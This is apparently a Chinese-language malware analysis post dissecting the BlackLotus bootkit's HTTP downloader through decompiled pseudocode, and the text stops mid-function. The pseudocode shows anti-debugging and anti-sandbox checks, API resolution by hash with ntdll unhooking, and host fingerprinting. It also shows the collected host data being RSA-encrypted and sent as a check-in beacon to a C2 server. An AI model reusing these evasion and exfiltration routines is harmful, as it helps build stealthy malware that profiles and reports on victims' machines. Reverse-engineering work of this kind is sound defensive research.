BlackLotus 分析3--http_downloader

BlackLotus 分析3--http_downloader

inject_into_winlogon MZ魔术字改为HC的PE文件

start

反调试和反沙箱部分与安装器相同

__int64 start()
{
  NtSetInformationThread((HANDLE)0xFFFFFFFFFFFFFFFEi64, ThreadHideFromDebugger, 0i64, 0);
  init_ntdll_api();
  if ( (unsigned int)is_default_locale_banned()
    || isBeingDebugged()
    || check_NtGlobalFlag()
    || is_being_debugged_ntqueryinformationprocess()
    || (unsigned int)is_kernel_debugger_present()
    || (unsigned int)is_being_debugged_by_vectored_exception_handler_int3()
    || (unsigned int)is_being_debugged_by_vectored_exception_handler_int2d()
    || (unsigned int)anti_sandbox_check_loaded_dlls_basename()
    || (unsigned int)anti_sandbox_check_loaded_dlls_fullname()
    || (unsigned int)anti_sandbox_check_processes_running()
    || (unsigned int)anti_sandbox_check_registry_key_present()
    || (unsigned int)anti_sandbox_check_registry_values()
    || (unsigned int)anti_sandbox_check_RSMB()
    || (unsigned int)anti_sandbox_check_ACPI()
    || (unsigned int)anti_sandbox_check_mac_addr()
    || (unsigned int)anti_sandbox_rdtsc() )
  {
    while ( 1 )
      ;
  }

  init_other_api();
  while ( (unsigned int)communication_140004804() != 1 )
    ;

  NtTerminateThread((HANDLE)0xFFFFFFFFFFFFFFFEi64, 1);
  return 0i64;
}

init_ntdll_api

通过hash值加载api

void __stdcall init_ntdll_api()
{
  struct _IMAGE_DOS_HEADER *ntdll; // rbx

  ntdll = get_ntdll_and_unhook(0xD22E2014);
  LdrGetProcedureAddress = (NTSTATUS (__stdcall *)(PVOID, PANSI_STRING, ULONG, PVOID *))get_proc_address_by_hash(
                                                                                          ntdll,
                                                                                          0xB08469DD,
                                                                                          0);
  RtlInitUnicodeString = (void (__stdcall *)(PUNICODE_STRING, PCWSTR))get_proc_address_by_hash(ntdll, 0xC8D8F9F4, 0);
  LdrLoadDll = (NTSTATUS (__stdcall *)(PWSTR, PULONG, PUNICODE_STRING, PVOID *))get_proc_address_by_hash(
                                                                                  ntdll,
                                                                                  0xF6CFC604,
                                                                                  0);
  RtlAllocateHeap = (PVOID (__stdcall *)(PVOID, ULONG, SIZE_T))get_proc_address_by_hash(ntdll, 0x572D53D3u, 0);
  RtlFreeHeap = (BOOLEAN (__stdcall *)(HANDLE, ULONG, PVOID))get_proc_address_by_hash(ntdll, 0x10DE9522u, 0);
  RtlRemoveVectoredExceptionHandler = (ULONG (__stdcall *)(PVOID))get_proc_address_by_hash(ntdll, 0xBB26CCEB, 0);
  RtlAddVectoredExceptionHandler = (PVOID (__stdcall *)(ULONG, PVECTORED_EXCEPTION_HANDLER))get_proc_address_by_hash(
                                                                                              ntdll,
                                                                                              0x89AB8454,
                                                                                              0);
  wcsstr = (wchar_t *(__cdecl *)(const wchar_t *, const wchar_t *))get_proc_address_by_hash(ntdll, 0xB2AECB6A, 0);
  itow = (wchar_t *(__cdecl *)(int, wchar_t *, int))get_proc_address_by_hash(ntdll, 0x839101F2, 0);
  RtlSubAuthoritySid = (PULONG (__stdcall *)(PSID, ULONG))get_proc_address_by_hash(ntdll, 0x319CEA81u, 0);
  RtlSubAuthorityCountSid = (PUCHAR (__stdcall *)(PSID))get_proc_address_by_hash(ntdll, 0xC96D110C, 0);
  snwprintf = (int (*)(wchar_t *, size_t, const wchar_t *, ...))get_proc_address_by_hash(ntdll, 0x81E8EC96, 0);
  RtlReAllocateHeap = (PVOID (__stdcall *)(HANDLE, ULONG, PVOID, SIZE_T))get_proc_address_by_hash(ntdll, 0x4D018A66u, 0);
  wtoi = (int (__cdecl *)(const wchar_t *))get_proc_address_by_hash(ntdll, 0xEF06C56u, 0);
  RtlWow64GetThreadContext = (NTSTATUS (__stdcall *)(HANDLE, PWOW64_CONTEXT))get_proc_address_by_hash(
                                                                               ntdll,
                                                                               0x5F6A5C62u,
                                                                               0);
  RtlWow64SetThreadContext = (NTSTATUS (__stdcall *)(HANDLE, PWOW64_CONTEXT))get_proc_address_by_hash(
                                                                               ntdll,
                                                                               0x31FC956u,
                                                                               0);
  RtlIdentifierAuthoritySid = (PSID_IDENTIFIER_AUTHORITY (__stdcall *)(PSID))get_proc_address_by_hash(
                                                                               ntdll,
                                                                               0xEF508FEu,
                                                                               0);
}

init_other_api

BOOL *__stdcall init_other_api()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  // winhttp.dll
  v0 = deobfuscate_wstring(word_14000ADB8, 0xCu, 1);
  winhttp = load_library_w((__int64)v0);
  // bcrypt.dll
  v2 = deobfuscate_wstring(word_14000ADD8, 0xBu, 1);
  bcrypt = load_library_w((__int64)v2);
  // crypt32.dll
  v4 = deobfuscate_wstring(word_14000ADF0, 0xCu, 1);
  crypt32 = load_library_w((__int64)v4);
  // kernel32.dll
  v6 = deobfuscate_wstring(word_14000AE10, 0xDu, 1);
  kernel32 = load_library_w((__int64)v6);
  // advapi32.dll
  v8 = deobfuscate_wstring(word_14000AE30, 0xDu, 1);
  advapi32 = load_library_w((__int64)v8);
  // wtsapi32.dll
  v10 = deobfuscate_wstring(word_14000AE50, 0xDu, 1);
  wtsapi32 = load_library_w((__int64)v10);
  // userenv.dll
  v12 = deobfuscate_wstring(word_14000AE70, 0xCu, 1);
  userenv = load_library_w((__int64)v12);
  WinHttpOpen = (HINTERNET (__stdcall *)(LPCWSTR, DWORD, LPCWSTR, LPCWSTR, DWORD))get_proc_address_by_hash(
                                                                                    winhttp,
                                                                                    0x8EAD24EE,
                                                                                    0);
  WinHttpConnect = (HINTERNET (__stdcall *)(HINTERNET, LPCWSTR, INTERNET_PORT, DWORD))get_proc_address_by_hash(
                                                                                        winhttp,
                                                                                        0xAF02EC06,
                                                                                        0);
  WinHttpOpenRequest = (HINTERNET (__stdcall *)(HINTERNET, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR, LPCWSTR *, DWORD))get_proc_address_by_hash(winhttp, 0xF1EA7021, 0);
  WinHttpSendRequest = (BOOL (__stdcall *)(HINTERNET, LPCWSTR, DWORD, LPVOID, DWORD, DWORD, DWORD_PTR))get_proc_address_by_hash(winhttp, 0xFACA0A03, 0);
  WinHttpReceiveResponse = (BOOL (__stdcall *)(HINTERNET, LPVOID))get_proc_address_by_hash(winhttp, 0xBFDC2C0u, 0);
  WinHttpReadData = (BOOL (__stdcall *)(HINTERNET, LPVOID, DWORD, LPDWORD))get_proc_address_by_hash(
                                                                             winhttp,
                                                                             0x66408124u,
                                                                             0);
  WinHttpCloseHandle = (BOOL (__stdcall *)(HINTERNET))get_proc_address_by_hash(winhttp, 0xA8EDA2BC, 0);
  WinHttpQueryHeaders = (BOOL (__stdcall *)(HINTERNET, DWORD, LPCWSTR, LPVOID, LPDWORD, LPDWORD))get_proc_address_by_hash(
                                                                                                   winhttp,
                                                                                                   0x674823C2u,
                                                                                                   0);
  WinHttpQueryDataAvailable = (BOOL (__stdcall *)(HINTERNET, LPDWORD))get_proc_address_by_hash(winhttp, 0xA882FF5B, 0);
  WinHttpSetOption = (BOOL (__stdcall *)(HINTERNET, DWORD, LPVOID, DWORD))get_proc_address_by_hash(
                                                                            winhttp,
                                                                            0xACEE6AF3,
                                                                            0);
  CreateEnvironmentBlock = (BOOL (__stdcall *)(LPVOID *, HANDLE, BOOL))get_proc_address_by_hash(userenv, 0x7E20FED6u, 0);
  DestroyEnvironmentBlock = (BOOL (__stdcall *)(LPVOID))get_proc_address_by_hash(userenv, 0x4AF5EC14u, 0);
  WTSEnumerateSessionsW = (BOOL (__stdcall *)(HANDLE, DWORD, DWORD, PWTS_SESSION_INFOW *, DWORD *))get_proc_address_by_hash(
                                                                                                     wtsapi32,
                                                                                                     0xBDB0B9AC,
                                                                                                     0);
  WTSQueryUserToken = (BOOL (__stdcall *)(ULONG, PHANDLE))get_proc_address_by_hash(wtsapi32, 0x5B88473Cu, 0);
  WTSFreeMemory = (void (__stdcall *)(PVOID))get_proc_address_by_hash(wtsapi32, 0xE51007E3, 0);
  WTSQuerySessionInformationW = (BOOL (__stdcall *)(HANDLE, DWORD, WTS_INFO_CLASS, LPWSTR *, DWORD *))get_proc_address_by_hash(wtsapi32, 0x4A851ECFu, 0);
  CreateProcessAsUserW = (BOOL (__stdcall *)(HANDLE, LPCWSTR, LPWSTR, LPSECURITY_ATTRIBUTES, LPSECURITY_ATTRIBUTES, BOOL, DWORD, LPVOID, LPCWSTR, LPSTARTUPINFOW, LPPROCESS_INFORMATION))get_proc_address_by_hash(advapi32, 0x7C259F87u, 0);
  Sleep = (void (__stdcall *)(DWORD))get_proc_address_by_hash(kernel32, 0xD8A41517, 0);
  GlobalMemoryStatusEx = (BOOL (__stdcall *)(LPMEMORYSTATUSEX))get_proc_address_by_hash(kernel32, 0x6DBFC569u, 0);
  WideCharToMultiByte = (int (__stdcall *)(UINT, DWORD, LPCWCH, int, LPSTR, int, LPCCH, LPBOOL))get_proc_address_by_hash(
                                                                                                  kernel32,
                                                                                                  0x45C481FDu,
                                                                                                  0);
  LoadLibraryA = (HMODULE (__stdcall *)(LPCSTR))get_proc_address_by_hash(kernel32, 0xDF2BBBEC, 0);
  GetProcAddress = (FARPROC (__stdcall *)(HMODULE, LPCSTR))get_proc_address_by_hash(kernel32, 0x80E96588, 0);
  BCryptOpenAlgorithmProvider = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE *, LPCWSTR, LPCWSTR, ULONG))get_proc_address_by_hash(bcrypt, 0xC694168A, 0);
  BCryptGetProperty = (NTSTATUS (__stdcall *)(BCRYPT_HANDLE, LPCWSTR, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(bcrypt, 0x5239823Fu, 0);
  BCryptCreateHash = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, BCRYPT_HASH_HANDLE *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(bcrypt, 0x9144E6F6, 0);
  BCryptHashData = (NTSTATUS (__stdcall *)(BCRYPT_HASH_HANDLE, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
                                                                                       bcrypt,
                                                                                       0xBC045064,
                                                                                       0);
  BCryptFinishHash = (NTSTATUS (__stdcall *)(BCRYPT_HASH_HANDLE, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
                                                                                         bcrypt,
                                                                                         0x5BF0EF2Du,
                                                                                         0);
  BCryptDestroyHash = (NTSTATUS (__stdcall *)(BCRYPT_HASH_HANDLE))get_proc_address_by_hash(bcrypt, 0x4F7C041Cu, 0);
  BCryptCloseAlgorithmProvider = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, ULONG))get_proc_address_by_hash(
                                                                                     bcrypt,
                                                                                     0x1ACC1354u,
                                                                                     0);
  BCryptEncrypt = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE, PUCHAR, ULONG, void *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(bcrypt, 0x63BF14B9u, 0);
  BCryptDestroyKey = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE))get_proc_address_by_hash(bcrypt, 0xB241FED1, 0);
  BCryptGenRandom = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
                                                                                       bcrypt,
                                                                                       0x3EC63647u,
                                                                                       0);
  BCryptDecrypt = (NTSTATUS (__stdcall *)(BCRYPT_KEY_HANDLE, PUCHAR, ULONG, void *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG *, ULONG))get_proc_address_by_hash(bcrypt, 0xC604BB01, 0);
  BCryptGenerateSymmetricKey = (NTSTATUS (__stdcall *)(BCRYPT_ALG_HANDLE, BCRYPT_KEY_HANDLE *, PUCHAR, ULONG, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(bcrypt, 0x5CD9DC29u, 0);
  BCryptSetProperty = (NTSTATUS (__stdcall *)(BCRYPT_HANDLE, LPCWSTR, PUCHAR, ULONG, ULONG))get_proc_address_by_hash(
                                                                                              bcrypt,
                                                                                              0x2163244Bu,
                                                                                              0);
  CryptBinaryToStringW = (BOOL (__stdcall *)(const BYTE *, DWORD, DWORD, LPWSTR, DWORD *))get_proc_address_by_hash(
                                                                                            crypt32,
                                                                                            0xBA9252BC,
                                                                                            0);
  CryptBinaryToStringA = (BOOL (__stdcall *)(const BYTE *, DWORD, DWORD, LPSTR, DWORD *))get_proc_address_by_hash(
                                                                                           crypt32,
                                                                                           0xBA9252A6,
                                                                                           0);
  CryptDecodeObjectEx = (BOOL (__stdcall *)(DWORD, LPCSTR, const BYTE *, DWORD, DWORD, PCRYPT_DECODE_PARA, void *, DWORD *))get_proc_address_by_hash(crypt32, 0xE57C09CE, 0);
  CryptImportPublicKeyInfoEx2 = (BOOL (__stdcall *)(DWORD, PCERT_PUBLIC_KEY_INFO, DWORD, void *, BCRYPT_KEY_HANDLE *))get_proc_address_by_hash(crypt32, 0x95F5B5CE, 0);
  CryptStringToBinaryA = (BOOL (__stdcall *)(LPCSTR, DWORD, DWORD, BYTE *, DWORD *, DWORD *, DWORD *))get_proc_address_by_hash(crypt32, 0xDD36B2A6, 0);
  result = (BOOL *)get_proc_address_by_hash(crypt32, 0xDD36B2BC, 0);
  CryptStringToBinaryW = (BOOL (__stdcall *)(LPCWSTR, DWORD, DWORD, BYTE *, DWORD *, DWORD *, DWORD *))result;
  return result;
}

communication_140004804

http通信部分

__int64 communication_140004804()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  memset(&httpst, 0, sizeof(httpst));
  httpst.sleep_dwMilliseconds = 0xEA60;
  httpst.RoundIndex = 1;
  v0 = 0i64;
  Heap = 0i64;
  v2 = 0;
  Sleep(10000u);
  // Mozilla/5.0
  pszAgentW = deobfuscate_wstring(word_14000B0A8, 0xCu, 1);
  httpst.hSession = WinHttpOpen(pszAgentW, 0, 0i64, 0i64, 0);
  if ( httpst.hSession )
  {
    while ( !(unsigned int)msftncsi_140003FD4(&httpst.hSession) )// 检测网络连接
      Sleep(10000u);

    info_enc = getinfo_140005DFC(httpst.hSession);
    v0 = info_enc;
    if ( info_enc )
    {
      v5 = strlen(info_enc) + 0x33;
      Heap = (char *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v5);
      if ( Heap )
      {
        // checkin=
        v6 = deobfuscate_bytes(checkin_14000B0C8, 9u, 1);
        if ( v5 )
        {
          if ( v5 <= 0x7FFFFFFF )
          {
            v7 = v5;
            v8 = Heap;
            v9 = v6 - (BYTE *)Heap;
            do
            {
              if ( !(2147483646 - v5 + v7) )
                break;

              v10 = v8[v9];
              if ( !v10 )
                break;

              *v8++ = v10;
              --v7;
            }
            while ( v7 );

            v11 = v8 - 1;
            if ( v7 )
              v11 = v8;

            *v11 = 0;
          }
          else
          {
            *Heap = 0;
          }
        }                                       // checkin=

        strcat(Heap, (const char *)v5);         // 拼接checkin=和info_enc
        do
        {
          if ( (unsigned int)msftncsi_140003FD4(&httpst.hSession) )
            v2 = do_1400049F4(&httpst, Heap);

          Sleep(httpst.sleep_dwMilliseconds);
        }
        while ( !v2 );
      }
    }
  }

  freebuf_1400073F4(&httpst.DataST_20);
  if ( Heap )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

  if ( v0 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v0);

  if ( httpst.hSession )
    WinHttpCloseHandle(httpst.hSession);

  return v2;
}

msftncsi_140003FD4

__int64 __fastcall msftncsi_140003FD4(HINTERNET *hSession)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0;
  v10 = 4;
  if ( *hSession )
  {
    // www.msftncsi.com
    pswzServerName = deobfuscate_wstring(word_14000B058, 0x11u, 1);
    hConnect = WinHttpConnect(*hSession, pswzServerName, 0x50u, 0);
    if ( hConnect )
    {
      // /ncsi.txt
      pwszObjectName = deobfuscate_wstring(word_14000B080, 0xAu, 0);
      // GET
      pwszVerb = deobfuscate_wstring(word_14000B098, 4u, 0);
      hRequest = WinHttpOpenRequest(hConnect, pwszVerb, pwszObjectName, 0i64, 0i64, 0i64, 0);
      hRequest1 = hRequest;
      if ( hRequest )
      {
        if ( WinHttpSendRequest(hRequest, 0i64, 0, 0i64, 0, 0, 0i64)
          && WinHttpReceiveResponse(hRequest1, 0i64)
          && WinHttpQueryHeaders(hRequest1, 0x20000013u, 0i64, &status, &v10, 0i64)// WINHTTP_QUERY_STATUS_CODE
          && status == HTTP_STATUS_OK )
        {
          v1 = 1;
        }

        WinHttpCloseHandle(hRequest1);
      }

      WinHttpCloseHandle(hConnect);
    }
  }

  return v1;
}

getinfo_140005DFC

CHAR *__fastcall getinfo_140005DFC(HINTERNET hSession)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v43 = 0i64;
  RegisteredOwnerData1 = 0i64;
  publicip1 = 0i64;
  CurrentBuild_1 = 0i64;
  CPUinfo1 = 0i64;
  GPUinfo1 = 0i64;
  v6 = 0i64;
  v7 = 4i64;
  isUEFISecureBootEnabled = isUEFISecureBootEnabled_140005CB4();
  // ???
  v8 = deobfuscate_wstring(word_14000B430, 4u, 1);
  ptr = &unknown;                               // ???
  v10 = (char *)v8 - &unknown;
  do
  {
    if ( v7 == -2147483642 )
      break;

    v11 = *(_WORD *)&ptr[v10];
    if ( !v11 )
      break;

    *(_WORD *)ptr = v11;
    ptr += 2;
    --v7;
  }
  while ( v7 );

  v12 = ptr - 2;
  if ( v7 )
    v12 = ptr;

  *(_WORD *)v12 = 0;
  HWID = get_HWID_MAC_VolumeSerialNumber_md5wstr();//作为后续通信的aeskey
  if ( HWID )
  {
    if ( gSession_RNG_14000F568 || (gSession_RNG_14000F568 = csprng_uint32()) != 0 )
    {
      RegisteredOwnerData = get_RegisteredOwner_data_140006238();
      RegisteredOwnerData1 = &unknown;
      if ( RegisteredOwnerData )
        RegisteredOwnerData1 = (char *)RegisteredOwnerData;

      if ( (unsigned int)wcslen((wchar_t *)RegisteredOwnerData1) <= 0xFF )
      {
        publicip = (char *)get_publicip_1400059FC(hSession);// 通过api.ipify.org获取公网ip
        publicip1 = &unknown;
        if ( publicip )
          publicip1 = publicip;

        CurrentBuild = get_CurrentBuild_140005BA0();// 获取系统bulidnumber
        CurrentBuild_1 = &unknown;
        if ( CurrentBuild )
          CurrentBuild_1 = (char *)CurrentBuild;

        if ( (unsigned int)wcslen((wchar_t *)CurrentBuild_1) <= 0x32 )
        {
          CPUinfo = get_ProcessorNameString_1400055A4();// 获取处理器信息
          CPUinfo1 = &unknown;
          if ( CPUinfo )
            CPUinfo1 = (char *)CPUinfo;

          GPUinfo = get_GPU_info_140005758();   // 获取GPU信息,SOFTWARE\Microsoft\Windows NT\CurrentVersion\WinSAT 可能不存在0.0
          GPUinfo1 = &unknown;
          if ( GPUinfo )
            GPUinfo1 = (char *)GPUinfo;

          RAM_GB = get_RAM_GB_140005C78();      // 获取内存大小
          if ( !RAM_GB )
            RAM_GB = 1977;

          RAM_GB1 = RAM_GB;
          ProductName_140005680 = get_ProductName_140005680();// 获取ProductName,系统版本名
          ProductName = &unknown;
          if ( ProductName_140005680 )
            ProductName = (char *)ProductName_140005680;

          v44 = ProductName;
          dwIntegrityLevel = get_IntegrityLevel_14000591C();// 获取当前的完整性级别 IntegrityLevel SECURITY_MANDATORY_
          IntegrityLevel1 = dwIntegrityLevel;
          // SECURITY_MANDATORY_UNTRUSTED_RID->0
          if ( !dwIntegrityLevel || dwIntegrityLevel == SECURITY_MANDATORY_SYSTEM_RID && !set_cmd_P_1400082B8() )
            IntegrityLevel1 = 1977;

          relpace_sep_1400052B4(RegisteredOwnerData1);// relpace "--> -
          relpace_sep_1400052B4(publicip1);
          relpace_sep_1400052B4(CurrentBuild_1);
          relpace_sep_1400052B4(CPUinfo1);
          relpace_sep_1400052B4(GPUinfo1);
          relpace_sep_1400052B4(ProductName);
          v22 = wcslen((wchar_t *)ProductName);
          v23 = wcslen((wchar_t *)GPUinfo1) + v22;
          v24 = wcslen((wchar_t *)CPUinfo1) + v23;
          v25 = wcslen((wchar_t *)CurrentBuild_1) + v24;
          v26 = wcslen((wchar_t *)publicip1) + v25;
          v27 = wcslen((wchar_t *)RegisteredOwnerData1) + v26;
          v28 = wcslen(HWID) + 0xA5 + v27;
          v48 = v28;
          ProcessHeap = NtCurrentPeb()->ProcessHeap;
          bufsz = v28 + 150;
          buf = (wchar_t *)RtlAllocateHeap(ProcessHeap, 8u, 2 * bufsz);
          if ( buf )
          {
            // {"HWID":"%s", "Session":"%lu", "Owner":"%s", "IP":"%s", "OS":"%s", "Edition":"%s", "CPU":"%s", "GPU":"%s", "RAM":"%lu", "Integrity":"%lu", "SecureBoot":"%i", "Build":"%lu"}
            v31 = deobfuscate_wstring(word_14000B440, 0xADu, 0);
            GPUinfo11 = &unknown;
            formatstr = v31;
            CPUinfo11 = &unknown;
            ProductName_1 = &unknown;
            v36 = v28 < 0x1F4;
            publicip11 = &unknown;
            v6 = v44;
            if ( v36 )
            {
              GPUinfo11 = GPUinfo1;
              if ( v36 )
              {
                CPUinfo11 = CPUinfo1;
                if ( v36 )
                  ProductName_1 = v44;
              }
            }

            if ( v48 < 0x1F4 )
              publicip11 = publicip1;

            // {
            //     "HWID": "%s",
            //     "Session": "%lu",
            //     "Owner": "%s",
            //     "IP": "%s",
            //     "OS": "%s",
            //     "Edition": "%s",
            //     "CPU": "%s",
            //     "GPU": "%s",
            //     "RAM": "%lu",
            //     "Integrity": "%lu",
            //     "SecureBoot": "%i",
            //     "Build": "%lu"
            // }
            if ( snwprintf(
                   buf,
                   bufsz,
                   formatstr,
                   HWID,
                   gSession_RNG_14000F568,
                   RegisteredOwnerData1,
                   publicip11,
                   CurrentBuild_1,
                   ProductName_1,
                   CPUinfo11,
                   GPUinfo11,
                   RAM_GB1,
                   IntegrityLevel1,
                   isUEFISecureBootEnabled,
                   29082022) >= 0 )             // ??2022 08 29
            {
              wcslen(buf);
              v38 = rsaenc_base64_140001370(buf);// rsa公钥加密,base64编码
              v43 = v38;
              if ( v38 )
                v43 = urlenc_140005498(v38, 1);
            }

            RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, buf);
          }
          else
          {
            v6 = v44;
          }
        }
      }
    }

    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, HWID);
    if ( RegisteredOwnerData1 && RegisteredOwnerData1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, RegisteredOwnerData1);

    if ( v6 && v6 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v6);

    if ( publicip1 && publicip1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, publicip1);

    if ( CurrentBuild_1 && CurrentBuild_1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, CurrentBuild_1);

    if ( CPUinfo1 && CPUinfo1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, CPUinfo1);

    if ( GPUinfo1 && GPUinfo1 != &unknown )
      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, GPUinfo1);
  }

  return v43;
}

isUEFISecureBootEnabled_140005CB4

_BOOL8 isUEFISecureBootEnabled_140005CB4()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  ret = 0;
  Handle = 0i64;
  ResultLength = 0;
  // \Registry\Machine\SYSTEM\CurrentControlSet\Control\SecureBoot\State
  v1 = deobfuscate_wstring(word_14000B370, 0x44u, 1);
  RtlInitUnicodeString(&v6, v1);
  v7.Length = 48;
  v7.ObjectName = &v6;
  v7.RootDirectory = 0i64;
  v7.Attributes = 64;
  *(_OWORD *)&v7.SecurityDescriptor = 0i64;
  if ( NtOpenKey(&Handle, 1u, &v7) >= 0 )
  {
    // UEFISecureBootEnabled
    v2 = deobfuscate_wstring(word_14000B400, 0x16u, 1);
    RtlInitUnicodeString(&ValueName, v2);
    NtQueryValueKey(Handle, &ValueName, KeyValuePartialInformation, 0i64, 0, &ResultLength);
    keyvalueinfo = (KEY_VALUE_PARTIAL_INFORMATION *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, ResultLength);
    if ( keyvalueinfo )
    {
      if ( NtQueryValueKey(Handle, &ValueName, KeyValuePartialInformation, keyvalueinfo, ResultLength, &ResultLength) >= 0
        && keyvalueinfo->Type == REG_DWORD )
      {
        LOBYTE(ret) = *(_DWORD *)keyvalueinfo->Data == 1;
      }

      RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, keyvalueinfo);
    }

    NtClose(Handle);
  }

  return ret;
}

get_HWID_MAC_VolumeSerialNumber_md5wstr

_WORD *get_HWID_MAC_VolumeSerialNumber_md5wstr()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v0 = 0i64;
  if ( (unsigned int)getMAC_1400076F0(mac) )
  {
    VolumeSerialNumber = get_VolumeSerialNumber_1400078C4();
    if ( VolumeSerialNumber )
    {
      v9[6] = VolumeSerialNumber;
      *(_WORD *)&v9[7] = VolumeSerialNumber >> 8;
      *(_DWORD *)v9 = *(_DWORD *)mac;
      *(_WORD *)&v9[4] = *(_WORD *)&mac[4];
      v9[9] = HIBYTE(VolumeSerialNumber);
      // MAC+VolumeSerialNumber   6+4 =10byte
      if ( (unsigned int)md5_1400017B0(v9, 0xAu, md5str) )
      {
        Heap = RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 0x42ui64);
        v0 = Heap;
        if ( Heap )
        {
          v3 = Heap;
          v4 = 33i64;
          v5 = (char *)((char *)md5str - (char *)Heap);
          do
          {
            if ( v4 == -2147483613 )
              break;

            v6 = *(_WORD *)((char *)v3 + (_QWORD)v5);
            if ( !v6 )
              break;

            *v3++ = v6;
            --v4;
          }
          while ( v4 );

          v7 = v3 - 1;
          if ( v4 )
            v7 = v3;

          *v7 = 0;
        }
      }
    }
  }

  return v0;
}

__int64 __fastcall getMAC_1400076F0(PVOID OutputBuffer)
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  v1 = 0;
  FileHandle = 0i64;
  // {xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
  netServiceName = getNetworkCards_ServiceName_140007A1C();
  Heap = 0i64;
  InputBuffer = OID_802_3_PERMANENT_ADDRESS;
  v5 = netServiceName;
  if ( netServiceName )
  {
    Data = (wchar_t *)netServiceName->Data;
    v7 = wcslen((wchar_t *)netServiceName->Data);
    Heap = (wchar_t *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, 2i64 * (unsigned int)(v7 + 0xA));
    if ( Heap )
    {
      // \Device\
      v8 = (unsigned int)deobfuscate_wstring(word_14000B8B0, 9u, 1);
      v9 = wcslen(Data);
      wcsncpy_0(Heap, (const wchar_t *)(unsigned int)(v9 + 10), v8);// \Device\
      v10 = wcslen(Data);
      wscat(Heap, (unsigned int)(v10 + 10), (__int64)Data);// \Device\{xxxxxxxx-xxxx-xxxx-xxxx-xxxxxxxxxxxx}
      RtlInitUnicodeString(&DestinationString, Heap);
      ObjectAttributes.RootDirectory = 0i64;
      ObjectAttributes.Length = 48;
      ObjectAttributes.Attributes = 64;
      ObjectAttributes.ObjectName = &DestinationString;
      *(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
      if ( NtCreateFile(&FileHandle, 0xC0000000, &ObjectAttributes, &IoStatusBlock, 0i64, 0x80u, 1u, 1u, 0, 0i64, 0) >= 0
        && NtDeviceIoControlFile(
             FileHandle,
             0i64,
             0i64,
             0i64,
             &IoStatusBlock,
             IOCTL_NDIS_QUERY_GLOBAL_STATS,
             &InputBuffer,
             4u,
             OutputBuffer,
             6u) >= 0 )
      {
        v1 = 1;
      }
    }
  }

  if ( FileHandle )
    NtClose(FileHandle);

  if ( Heap )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, Heap);

  if ( v5 )
    RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v5);

  return v1;
}

__int64 get_VolumeSerialNumber_1400078C4()
{
  // [COLLAPSED LOCAL DECLARATIONS. PRESS KEYPAD CTRL-"+" TO EXPAND]

  VolumeSerialNumber = 0;
  FileHandle = 0i64;
  v1 = 0i64;
  v2 = 0;
  // \SystemRoot\
  v3 = deobfuscate_wstring(word_14000B7D0, 0xDu, 1);
  RtlInitUnicodeString(&v7, v3);
  ObjectAttributes.Length = 48;
  ObjectAttributes.RootDirectory = 0i64;
  ObjectAttributes.Attributes = 64;
  ObjectAttributes.ObjectName = &v7;
  *(_OWORD *)&ObjectAttributes.SecurityDescriptor = 0i64;
  if ( NtCreateFile(
         &FileHandle,
         FILE_GENERIC_READ,
         &ObjectAttributes,
         &IoStatusBlock,
         0i64,
         FILE_ATTRIBUTE_NORMAL,
         3u,
         1u,
         1u,
         0i64,
         0) >= 0 )
  {
    while ( 1 )
    {
      if ( v1 )
        RtlFreeHeap(NtCurrentPeb()->ProcessHeap, 0, v1);

      v2 += 1024;
      Heap = (FILE_FS_VOLUME_INFORMATION *)RtlAllocateHeap(NtCurrentPeb()->ProcessHeap, 8u, v2);
      v1 = Heap;
      if ( !Heap )
        break;

      v5 = NtQueryVolumeInformationFile(FileHandle, &IoStatusBlock, Heap, v2, FileFsVolumeInformation);
      if ( v5 != -1073741789 )
      {
        if ( v5 >= 0 )
          VolumeSerialNumber = v1->VolumeSerialNumber;

